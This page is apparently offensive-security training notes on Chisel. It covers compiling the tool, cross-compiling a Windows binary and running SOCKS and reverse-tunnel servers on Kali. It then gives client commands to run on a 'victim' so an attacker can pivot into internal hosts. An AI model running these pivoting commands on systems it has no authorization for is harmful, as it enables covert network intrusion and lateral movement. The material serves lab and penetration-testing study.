Chisel

Compile

Linux

sudo apt install golang
git clone https://github.com/jpillora/chisel.git
cd chisel/
go build

We can cross-compile chisel for other operating systems and architectures with the Golang compiler. e.g. 64-bit windows

Windows

env GOOS=windows GOARCH=amd64 
go build -o chisel.exe -ldflags "-s -w"

Setup

Server

Chisel SOCKS proxy server

./chisel server -p 8080 --socks5

Kali SSH SOCKS proxy server

sudo sed -i 's/#PasswordAuthentication yes/PasswordAuthentication yes/g' /etc/ssh/sshd_config
sudo systemctl start ssh.service

ssh -N -D 0.0.0.0:1080 localhost

Client (transfer complied .exe to jumping victim)

providing the IP address and port of the server instance of chisel

chisel.exe client 192.168.119.120:8080 socks

Usage

sudo proxychains rdesktop 192.168.120.10

We can also use chisel with the classic reverse SSH tunnel syntax by specifying the -reverse option instead of --socks5 on the server side.

Start server listening on 8000:

./chisel server -p 8000 --reverse

From victim:

Command

Notes

chisel client 192.168.119.120:8000 R:8080:127.0.0.1:80

Listen on Kali 80, forward to jumping victim local port 80

chisel client 192.168.119.120:8000 R:4444:192.168.120.10:80

Listen on Kali 4444, forward to next victim port 80

chisel client 192.168.119.120:8000 R:socks

Create SOCKS5 listener on 1080 on Kali, proxy through client

https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html0xdf.gitlab.io

PreviousMetasploit Tunneling NextLinux Lateral Movement

Last updated 1 year ago

hashtagCompile

hashtagSetup

hashtagServer

hashtagChisel SOCKS proxy server

hashtagKali SSH SOCKS proxy server

hashtagClient (transfer complied .exe to jumping victim)

hashtagUsage